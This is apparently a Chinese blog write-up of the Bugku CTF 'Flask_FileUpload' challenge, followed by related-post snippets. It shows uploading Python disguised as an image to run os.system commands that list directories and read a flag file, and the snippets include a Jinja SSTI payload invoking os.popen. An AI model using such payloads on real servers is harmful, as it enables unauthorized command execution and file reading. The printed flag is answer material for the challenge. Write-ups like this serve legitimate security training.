bugku CTF练习:Flask_FileUpload思路

最新推荐文章于 2024-07-30 17:28:52 发布
最新推荐文章于 2024-07-30 17:28:52 发布
阅读量1.9k 收藏 10
点赞数 2
分类专栏: bugku 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xijieyuan2qi/article/details/122080108
版权

https://ctf.bugku.com/challenges/detail/id/204.html

 

打开页面是这个样子。右键查看源代码。

它提示我说会用Python去执行。太棒了。

选择一张普通图片。点击上传。把流量转到burpsuite上。

把burpsuite上抓到的包发送到重发模块

把图片的内容删除。改成

import os
print(os.system('ls -al'))

发现执行了Python,想了一下。应该是Python执行系统命令。
 

 一步一步。发现上一级目录上有一个flag的文件。

执行下面的代码:

import os
print(os.system('cat ../flag'))

就得到了flag

flag{5f40e0bdb1089bf9dcb06a384c2b2008}

 

baby-shark
关注
专栏目录
CTF之路:Flask_FileUpload文件上传漏洞利用、关于os.system()与更强大的os.popen()
zw05011的博客
01-08 3865
1.题目 BP上分析数据包,发现有提示: Give me the file, and I will return the Running results by python to you! 意思是:上传一个文件,系统将用python运行它,并返回结果 经验告诉我们,上传的文件里应该含有python可执行代码。 知识点 os.system()函数实现在程序执行命令行命令 解题分析 上传文件发现似乎只能上传图片 这也没关系,可以把文件重命名为.png/jpg 打开一个file,写入代码 import os
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 942
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
flask-file-upload:轻松上传Flask文件
02-05
Flask&SqlAlchemy一起使用的库可将文件存储在服务器上和数据库 阅读文档: 安装 请安装最新的稳定版本: pip install flask-file-upload 常规Flask配置选项 (重要:在启动FileUpload之前,需要设置以下配置变量) # This is the directory that flask-file-upload saves files to. Make sure the UPLOAD_FOLDER is the same as Flasks's static_folder or a child. For example: ap
BugKu:Flask_FileUpload
最新发布
m0_63944205的博客
07-30 136
并且告诉我们给它一个文件,他将通过python运行并告知我们结果。这里我们看到上传成功但并没有有用的信息,我们查看源码看看。我们发现下面有很多文件,并包含flag,3.我们修改朋友脚本去查看flag。并将py文件后缀改成jpg上传。
BugKu-CTF(web篇)---Flask_FileUpload
Nailaoyyds的博客
03-07 3361
WEB题型 文件上传和远程代码执行 列出上传文件夹下的文件 两个文件夹和一个py文件 看一下app.py的内容 发现有一个/flag的文件 上传得到flag
[CTF]Bugku Flask_FileUpload
第八个男人
08-10 1023
https://ctf.bugku.com/challenges/detail/id/204.html 上传文件,显示只能提交jpg或者png的图片格式。 但是页面的response有提示,需要提交python命令。 直接上传python脚本,修改包的文件扩展名为jpg,python内容是获取当前目录或者上一层目录的文件。这里只截图../的信息,看到里面有个flag文件,再加一段cat这个flag文件便可取得flag。 import os os.system('ls ../') os.sy.
Bugku CTF Web Flask_FileUpload
网安小趴菜
10-20 1000
Bugku CTF Web Flask_FileUpload
Bugku CTF Flask_FileUpload 解题思路
m0_73734159的博客
10-12 946
Bugku CTF Flask_FileUpload 解题思路
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1909
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
BugkuCTF-Reverse题入门逆向多解法
am_03的博客
08-28 537
补充:IDA里面十六进制转字符的快捷键:R 方法一 第一步PEID,这里可以看出程序是32位的 查壳:(无壳) 拖进IDA32分析: 先查看伪码:F5 找到main函数 发现有许多 mov 指令,66H 是 ‘f’,6CH 是 ‘l’,推测这就是 flag 的 ASCII 码值。 得到flag:flag{Re_1s_S0_C0OL} 方法二 也可以用动态调试的方法。 动态调试这就需要用到 OD。先下一个断点,然后单步运行,看看栈里的变化。 例如,我就找个 0x00401475 的地址。 在 OD
bugkuctf逆向入门练习(Easy_vb)
song_10的博客
10-30 1878
bugku的逆向第二题:Easy_vb 下载附件后是一个exe的可执行程序,打开软件,似乎没有什么用: 查壳,发现程序是VB写的,无壳 先载入OD,搜索字符串,发现flag(MCTF{_N3t_Rev_1s_E4ay_}): 下面再载入IDA看一看: 发现程序只有一个主函数,在反汇编窗口发现flag: ...
BugkuFlask_FileUpload
金 帛的博客
05-06 1566
Bugku的WP
BUGKU_CTF- Flask_FileUpload && 1和0的故事
qq_46015509的博客
05-12 904
BUGKU_CTF- Flask_FileUpload && 1和0的故事 1.Flask_FileUpload <1>进入Flask_FileUpload环境 ,查看网页源代码 出现 — Give me the file, and I will return the Running results by python to you!(显示将要返回以python运行的结果给你,意思让你在文件写入一个python代码,然后拿到它的flag) – accept=".jpg,.png
Bugku 解题学习 Flask_FileUpload
qq_42411587的博客
08-07 565
WEB 1. 题目来源 Flask_FileUpload 解题需要3个金币(还挺贵的) 2. 解题过程 打开链接,显示如下: 查看源代码 这里的提醒大致意思是,如果给一个文件,将使用python执行这个文件,那基本思路有了,就是使用python代码探查一下目录,找找有没有一些可能保存flag的文件。 如下代码:查看./目录有哪些文件 import os print(os.system('ls ./')) 将上述文件保存后,修改后缀为.jpg,上传后,查看新页面的源代码: 查看app.p
使用put方法上传文件_一篇文章整合基于Flask应用Graphql上传文件的方法
weixin_39609953的博客
11-29 275
Graphql 定义GraphQL 是 API 的查询语言,是用于现有的数据来完成查询。GraphQL 为 API 的数据提供了完整且易于理解的描述,使客户能够准确地请求他们所需的内容。文章背景一个开发项目要求基于 Flask 应用 GraphQL API 进行开发,但是在开发过程发现,部分请求涉及到上传文件等操作,但是众所周知 GraphQL 对 文件上传的支持非常的不好,且没有比较好用的官...
BugKuFlask_FileUpload
qq_47480932的博客
04-07 1369
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。时,服务器会检查是否有文件被上传,然后将文件保存到指定的上传文件夹。首先对于这个有flask构建的web文件上传程序,其包含了一个文件上传的端点。提示文件上传成功,但是没有flag呀,差点就要放弃了,先别着急,查看一下源代码。上传文件,与之前的上传步骤是一样的,拿到flag!
BugKu_web_Flask_FileUpload
weixin_47443077的博客
07-19 371
BugKu_web_Flask_FileUpload 打开页面发现是一个文件上传点,尝试上传文件 F12检查发现上传文件的类型只能为jpg,png形式的,而且提示说上传的文件会用python执行 尝试随便上传一个图片,用bp抓包,将文件内容改为: import os os.system('cat /flag') 若上传其他文件也可以,就要注意修改文件名后缀和Content-Type。拿到flag! ...
bugku——Flask_FileUpload
yc20030119的博客
08-21 797
照例先检查一下源代码(显示文件只能通过jpg或者png进行上传,并且是用python进行返回)那条件都了解了,接下来就是写对应的文件了(我用笔记本写的相对应的文件)第一个文件上传结果为目录(惊奇的发现里面有flag文件)然后将文件的后缀名改成png结尾的文件。第二个文件(text1)然后将两个文件分别上传。第一个文件(text)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值